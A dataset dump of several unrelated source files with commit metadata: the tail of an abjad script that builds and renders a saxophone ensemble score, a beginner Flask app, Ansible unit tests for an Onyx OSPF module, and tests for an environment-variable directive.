    for rhythm_maker, grouper in itertools.groupby(
        timespan_list,
        key=key_function,
    ):
        # We know the voice name of each timespan because a) the timespan
        # list is in a dictionary, associated with that voice name and b)
        # each timespan's annotation is a MusicSpecifier instance which
        # knows the name of the voice the timespan should be used for.
        # This double-reference to the voice is redundant here, but in a
        # different implementation we could put *all* the timespans into
        # one timespan list, split them, whatever, and still know which
        # voice they belong to because their annotation records that
        # information.
        durations = [timespan.duration for timespan in grouper]
        container = make_container(rhythm_maker, durations)
        voice = score[voice_name]
        voice.append(container)
print('Splitting and rewriting ...')
# split and rewrite meters
for voice in abjad.iterate(score['Staff Group']).components(abjad.Voice):
    for i , shard in enumerate(abjad.mutate(voice[:]).split(time_signatures)):
        time_signature = time_signatures[i]
        abjad.mutate(shard).rewrite_meter(time_signature)
print('Beautifying score ...')
# cutaway score
# Collapse the staff to a single line across every contiguous run of rests,
# restoring the normal staff symbol afterwards.
for staff in abjad.iterate(score['Staff Group']).components(abjad.Staff):
    for selection in abjad.select(staff).components(abjad.Rest).group_by_contiguity():
        start_command = abjad.LilyPondLiteral(
            r'\stopStaff \once \override Staff.StaffSymbol.line-count = #1 \startStaff',
            format_slot='before',
        )
        stop_command = abjad.LilyPondLiteral(
            r'\stopStaff \startStaff',
            format_slot='after',
        )
        abjad.attach(start_command, selection[0])
        abjad.attach(stop_command, selection[-1])
# Make pitches
print('Adding pitch material ...')
def cyc(lst):
    """Return an infinite iterator cycling over *lst*.

    Thin wrapper around itertools.cycle (itertools is already in scope for
    the groupby pass above).  *lst* must be non-empty.
    """
    return itertools.cycle(lst)
# attach instruments and clefs
print('Adding attachments ...')
bar_line = abjad.BarLine('||')
metro = abjad.MetronomeMark((1, 4), 90)
markup = abjad.Markup(r'\bold { Invocation }')
mark = abjad.RehearsalMark(markup=markup)
# One instrument per staff, in score order.  The three cyclic generators
# below (instruments, margin abbreviations, full names) are consumed in
# lockstep, so the three plans must stay the same length and order.
_instrument_plan = [
    (abjad.SopraninoSaxophone, 1),
    (abjad.SopranoSaxophone, 3),
    (abjad.AltoSaxophone, 3),
    (abjad.TenorSaxophone, 3),
    (abjad.BaritoneSaxophone, 3),
    (abjad.BassSaxophone, 2),
    (abjad.ContrabassSaxophone, 1),
]
instruments = cyc([
    instrument_class()
    for instrument_class, count in _instrument_plan
    for _ in range(count)
])
_abbreviation_texts = [
    'spro.',
    'spr.1', 'spr.2', 'spr.3',
    'alt.1', 'alt.2', 'alt.3',
    'ten.1', 'ten.2', 'ten.3',
    'bar.1', 'bar.2', 'bar.3',
    'bs.1', 'bs.2',
    'cbs.',
]
abbreviations = cyc([
    abjad.MarginMarkup(markup=abjad.Markup(text),)
    for text in _abbreviation_texts
])
_full_name_texts = [
    'Sopranino',
    'Soprano 1', 'Soprano 2', 'Soprano 3',
    'Alto 1', 'Alto 2', 'Alto 3',
    'Tenor 1', 'Tenor 2', 'Tenor 3',
    'Baritone 1', 'Baritone 2', 'Baritone 3',
    'Bass 1', 'Bass 2',
    'Contrabass',
]
names = cyc([
    abjad.StartMarkup(markup=abjad.Markup(text),)
    for text in _full_name_texts
])
# Attach instrument, margin abbreviation and full name to the first leaf of
# every staff, consuming the cyclic generators in staff order.
for staff in abjad.iterate(score['Staff Group']).components(abjad.Staff):
    leaf1 = abjad.select(staff).leaves()[0]
    abjad.attach(next(instruments), leaf1)
    abjad.attach(next(abbreviations), leaf1)
    abjad.attach(next(names), leaf1)
# NOTE(review): the trailing ``[0]`` selects only the *first* staff, so this
# loop iterates over that staff's contents (its voices), not over staves --
# presumably intended to put the tempo mark and final barline on the top
# staff only; confirm.
for staff in abjad.select(score['Staff Group']).components(abjad.Staff)[0]:
    leaf1 = abjad.select(staff).leaves()[0]
    last_leaf = abjad.select(staff).leaves()[-1]
    abjad.attach(metro, leaf1)
    abjad.attach(bar_line, last_leaf)
# Rehearsal mark on the first leaf of the global context.
for staff in abjad.iterate(score['Global Context']).components(abjad.Staff):
    leaf1 = abjad.select(staff).leaves()[0]
    abjad.attach(mark, leaf1)
# Rewrite written pitches for the transposing saxophones.
for staff in abjad.iterate(score['Staff Group']).components(abjad.Staff):
    abjad.Instrument.transpose_from_sounding_pitch(staff)
# Make a lilypond file and show it:
score_file = abjad.LilyPondFile.new(
    score,
    includes=['first_stylesheet.ily'],
)
print("Made Score File")
# Comment measure numbers - this function is in the baca.SegmentMaker, not abjad.SegmentMaker
# abjad.SegmentMaker.comment_measure_numbers(score)
###################
# Alternative persistence path (kept for reference): render straight to a
# PDF on disk, timing the LilyPond run and opening the result.
# #print(format(score_file))
# directory = '/Users/evansdsg2/Scores/guerrero/Test'
# pdf_path = f'{directory}/Test.pdf'
# path = pathlib.Path('Test.pdf')
# if path.exists():
#     print(f'Removing {pdf_path} ...')
#     path.unlink()
# time_1 = time.time()
# print(f'Persisting {pdf_path} ...')
# result = abjad.persist(score_file).as_pdf(pdf_path)
# print(result[0])
# print(result[1])
# print(result[2])
# success = result[3]
# if success is False:
#     print('LilyPond failed!')
# time_2 = time.time()
# total_time = time_2 - time_1
# print(f'Total time: {total_time} seconds')
# if path.exists():
#     print(f'Opening {pdf_path} ...')
#     os.system(f'open {pdf_path}')
# for staff in abjad.iterate(score['Staff Group']).components(abjad.Staff):
#     abjad.show(staff)
print("Showing Score")
# Render with LilyPond and open the resulting PDF.
abjad.show(score)
| [
"ivan.alexander.moscotta@gmail.com"
] | ivan.alexander.moscotta@gmail.com |
eabad72c1ca5058e9e7cc8a1c52c7ef1240c9e36 | 4c2f47ea3e254c2251861fc93b9815f7cbb42921 | /flask/flask sample/helloworld.py | c431a1ae10637775dfa973dd347b4f8a372041b7 | [] | no_license | Devanand072001/python-tutorials | c719c6c9637a5efd86a07aa28cad5cad45593283 | a873906030da2b197a64bfbd3f15cae1accc55e7 | refs/heads/main | 2023-06-20T04:18:30.997558 | 2021-07-21T07:34:30 | 2021-07-21T07:34:30 | 388,032,646 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | from flask import Flask, render_template
app = Flask(__name__)
# Display name injected into the page templates below.
name = "devanand"
# Sample mapping rendered on the /about page.
thisdict = {
    "brand": "Ford",
    "model": "Mustang",
    "year": 1964
}
class Employee:
    """Plain data holder for an employee shown on the /employee page."""

    def __init__(self, name, age, salary):
        # Templates read these attributes directly.
        self.name = name
        self.age = age
        self.salary = salary
# Two sample records displayed on the /employee page.
employee1 = Employee("devanand", 19, 50_000)
employee2 = Employee("bob", 17, 55_000)
@app.route('/')
@app.route("/home")
def home():
    """Serve the landing page, passing the display name to the template."""
    template_context = {"name": name}
    return render_template("home.html", **template_context)
@app.route("/about")
def about():
    """Serve the about page with the sample dict and display name."""
    return render_template(
        "about.html",
        thisdict=thisdict,
        name=name,
    )
@app.route("/employee")
def employee():
    """Serve the employee page with the two sample Employee records."""
    template_context = {"emp1": employee1, "emp2": employee2}
    return render_template("employee.html", **template_context)
# Run Flask's development server (with debugger/auto-reload) when executed
# directly rather than imported.
if __name__ == "__main__":
    app.run(debug=True)
| [
"devanand.cs19@bitsathy.ac.in"
] | devanand.cs19@bitsathy.ac.in |
c7e0e8f56c9b540a6d37dce314d31c36ea920326 | 27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f | /tests/unit/modules/network/onyx/test_onyx_ospf.py | 665633222c74febcc7f196f3e51d0f6b0b91d4fb | [] | no_license | coll-test/notstdlib.moveitallout | eb33a560070bbded5032385d0aea2f3cf60e690b | 0987f099b783c6cf977db9233e1c3d9efcbcb3c7 | refs/heads/master | 2020-12-19T22:28:33.369557 | 2020-01-23T18:51:26 | 2020-01-23T18:51:26 | 235,865,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,664 | py | #
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.notstdlib.moveitallout.tests.unit.compat.mock import patch
from ansible_collections.notstdlib.moveitallout.plugins.modules import onyx_ospf
from ansible_collections.notstdlib.moveitallout.tests.unit.modules.utils import set_module_args
from ..onyx_module import TestOnyxModule, load_fixture
class TestOnyxOspfModule(TestOnyxModule):
    """Unit tests for the onyx_ospf Ansible module.

    Device output is faked with the fixture files
    ``onyx_ospf_show.cfg`` / ``onyx_ospf_interfaces_show.cfg``, and
    ``load_config`` is patched so the generated CLI commands can be
    asserted without a device.
    """

    module = onyx_ospf

    def setUp(self):
        """Patch the module's config getters and load_config."""
        super(TestOnyxOspfModule, self).setUp()
        # When False, load_fixtures skips the fixtures so the module sees no
        # existing OSPF configuration (used by test_ospf_add).
        self._ospf_exists = True
        self.mock_get_config = patch.object(
            onyx_ospf.OnyxOspfModule,
            "_get_ospf_config")
        self.get_config = self.mock_get_config.start()
        self.mock_get_interfaces_config = patch.object(
            onyx_ospf.OnyxOspfModule,
            "_get_ospf_interfaces_config")
        self.get_interfaces_config = self.mock_get_interfaces_config.start()
        self.mock_load_config = patch(
            'ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.onyx.onyx.load_config')
        self.load_config = self.mock_load_config.start()

    def tearDown(self):
        """Stop every patcher started in setUp.

        Bug fix: the interfaces-config patcher was previously started but
        never stopped, leaking the patch into later tests.
        """
        super(TestOnyxOspfModule, self).tearDown()
        self.mock_get_config.stop()
        self.mock_get_interfaces_config.stop()
        self.mock_load_config.stop()

    def load_fixtures(self, commands=None, transport='cli'):
        """Feed fixture output (or None when no OSPF exists) to the mocks."""
        if self._ospf_exists:
            config_file = 'onyx_ospf_show.cfg'
            self.get_config.return_value = load_fixture(config_file)
            config_file = 'onyx_ospf_interfaces_show.cfg'
            self.get_interfaces_config.return_value = load_fixture(config_file)
        else:
            self.get_config.return_value = None
            self.get_interfaces_config.return_value = None
        self.load_config.return_value = None

    def test_ospf_absent_no_change(self):
        """Removing a non-existent OSPF instance is a no-op."""
        set_module_args(dict(ospf=3, state='absent'))
        self.execute_module(changed=False)

    def test_ospf_present_no_change(self):
        """Re-declaring the existing configuration is a no-op."""
        interface = dict(name='Loopback 1', area='0.0.0.0')
        set_module_args(dict(ospf=2, router_id='10.2.3.4',
                             interfaces=[interface]))
        self.execute_module(changed=False)

    def test_ospf_present_remove(self):
        """Removing the existing instance issues 'no router ospf'."""
        set_module_args(dict(ospf=2, state='absent'))
        commands = ['no router ospf 2']
        self.execute_module(changed=True, commands=commands)

    def test_ospf_change_router(self):
        """Changing the router-id reconfigures it in order."""
        interface = dict(name='Loopback 1', area='0.0.0.0')
        set_module_args(dict(ospf=2, router_id='10.2.3.5',
                             interfaces=[interface]))
        commands = ['router ospf 2', 'router-id 10.2.3.5', 'exit']
        self.execute_module(changed=True, commands=commands, sort=False)

    def test_ospf_remove_router(self):
        """Omitting router_id removes the configured router-id."""
        interface = dict(name='Loopback 1', area='0.0.0.0')
        set_module_args(dict(ospf=2, interfaces=[interface]))
        commands = ['router ospf 2', 'no router-id', 'exit']
        self.execute_module(changed=True, commands=commands, sort=False)

    def test_ospf_add_interface(self):
        """Adding a second interface attaches it to the OSPF area."""
        interfaces = [dict(name='Loopback 1', area='0.0.0.0'),
                      dict(name='Loopback 2', area='0.0.0.0')]
        set_module_args(dict(ospf=2, router_id='10.2.3.4',
                             interfaces=interfaces))
        commands = ['interface loopback 2 ip ospf area 0.0.0.0']
        self.execute_module(changed=True, commands=commands)

    def test_ospf_remove_interface(self):
        """Omitting interfaces detaches the existing one."""
        set_module_args(dict(ospf=2, router_id='10.2.3.4'))
        commands = ['interface loopback 1 no ip ospf area']
        self.execute_module(changed=True, commands=commands)

    def test_ospf_add(self):
        """Creating a new instance configures router-id and all interfaces."""
        self._ospf_exists = False
        interfaces = [dict(name='Loopback 1', area='0.0.0.0'),
                      dict(name='Vlan 210', area='0.0.0.0'),
                      dict(name='Eth1/1', area='0.0.0.0'),
                      dict(name='Po1', area='0.0.0.0')]
        set_module_args(dict(ospf=2, router_id='10.2.3.4',
                             interfaces=interfaces))
        commands = ['router ospf 2', 'router-id 10.2.3.4', 'exit',
                    'interface loopback 1 ip ospf area 0.0.0.0',
                    'interface vlan 210 ip ospf area 0.0.0.0',
                    'interface ethernet 1/1 ip ospf area 0.0.0.0',
                    'interface port-channel 1 ip ospf area 0.0.0.0']
        self.execute_module(changed=True, commands=commands)
| [
"wk@sydorenko.org.ua"
] | wk@sydorenko.org.ua |
19048b8bffc93528dd413a6f873ed1b800c384e0 | f9f918f990958744398b8a3d4bc8f6394d801ca6 | /hilo_rpc/tests/serialize/test_directive.py | 2a94911c6069b5887a67c587c5e6e40b7fa2c527 | [] | no_license | eaugeas/hilo-tfx | bfceb6e8cabc4568eb8c8b32bdb67c3b7be52db4 | c7f3b013db3a0f07c9e61b00e137d89e7189ead1 | refs/heads/master | 2022-04-15T23:22:40.611827 | 2020-04-16T17:10:29 | 2020-04-16T17:10:29 | 246,938,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,030 | py | import unittest
import os
from hilo_rpc.serialize.directive import EnvironDirective
class DirectiveTest(unittest.TestCase):
    """Tests for EnvironDirective's environment-variable resolution."""

    def test_environ_directive_ok_use_passed_env(self):
        """$PROPERTY resolves from an explicitly supplied env mapping."""
        directive = EnvironDirective(
            'env', '$PROPERTY', env={'PROPERTY': 'VALUE'})
        self.assertEqual(directive.execute(), 'VALUE')

    def test_environ_directive_ok_use_os_environ(self):
        """$PROPERTY resolves from os.environ when use_os_environ is set."""
        os.environ['PROPERTY'] = 'VALUE'
        directive = EnvironDirective(
            'env', '$PROPERTY', use_os_environ=True)
        self.assertEqual(directive.execute(), 'VALUE')

    def test_environ_directive_fail_no_env_variable(self):
        """An unresolvable variable raises KeyError."""
        directive = EnvironDirective('env', '$PROPERTY', env={})
        with self.assertRaises(KeyError):
            directive.execute()
# Allow running this test module directly with `python test_directive.py`.
if __name__ == '__main__':
    unittest.main()
| [
"noreply@github.com"
] | eaugeas.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.